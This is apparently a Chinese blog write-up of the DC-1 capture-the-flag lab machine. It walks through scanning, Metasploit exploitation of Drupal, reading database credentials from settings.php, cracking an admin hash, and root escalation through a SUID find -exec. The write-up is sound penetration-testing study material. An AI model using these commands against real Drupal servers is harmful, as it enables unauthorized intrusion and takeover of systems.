-
靶机 DC_1
DC_1
信息搜集
存活检测
详细扫描
网页目录扫描
网页信息搜集
-
cms 为 Drupal
漏洞利用
-
使用 msf 搜索 drupal 的漏洞
启动
msfconsole- 1
搜索
search drupal- 1
-
尝试编号为 0 的漏洞
失败
-
利用编号为 1 的漏洞
use 1- 1
查看需要配置的选项
show options- 1
设置目标 ip
set rhost 10.4.7.145- 1
启动
run- 1
-
成功建立连接
-
获取 shell 权限
shell- 1
-
回显提示符
python -c 'import pty;pty.spawn("/bin/bash")'- 1
-
第一个 flag
-
查看 drupal 默认配置文件
路径
/var/www/sites/default- 1
cat settings.php- 1
数据库登录
-
在 drupal 配置文件中查找到了第二个 flag 以及数据库的账密信息
用户名:dbuser 密码:R0ck3t- 1
- 2
-
成功登录数据库
-
搜集有用信息
-
查看 users 表
-
md5 解密
密码为
53cr3t
-
admin 登录
在 content 目录下拿到第三个 flag
-
提示 perms find -exec
提权
-
查找具有 suid 权限的命令
具有 suid 权限的命令在使用时会以命令所有者的权限运行
命令的所有者一般为 root
find / -perm -4000 2>/dev/null- 1
-
find 提权
find \ a -exec 'bash' \;- 1
-
bash 提权失败,尝试使用 sh
成功 root
-
final flag
总结
- Metasploit 漏洞利用
- find 提权
-
-
相关阅读:
字符串相乘
一种多源信息融合方法及其应用(Matlab代码实现)
大模型应用开发:为产品创建一个AI客服/智能助手
JAVA常用stream流操作demo演示
03——go开发工具
数据结构前瞻
MSDC 4.3 接口规范(22)
安卓开发-基础知识补习12
3款国产办公软件,不仅好用,还支持linux国产操作系统
重温FPGA开发35
- 原文地址:https://blog.csdn.net/weixin_51559599/article/details/133973675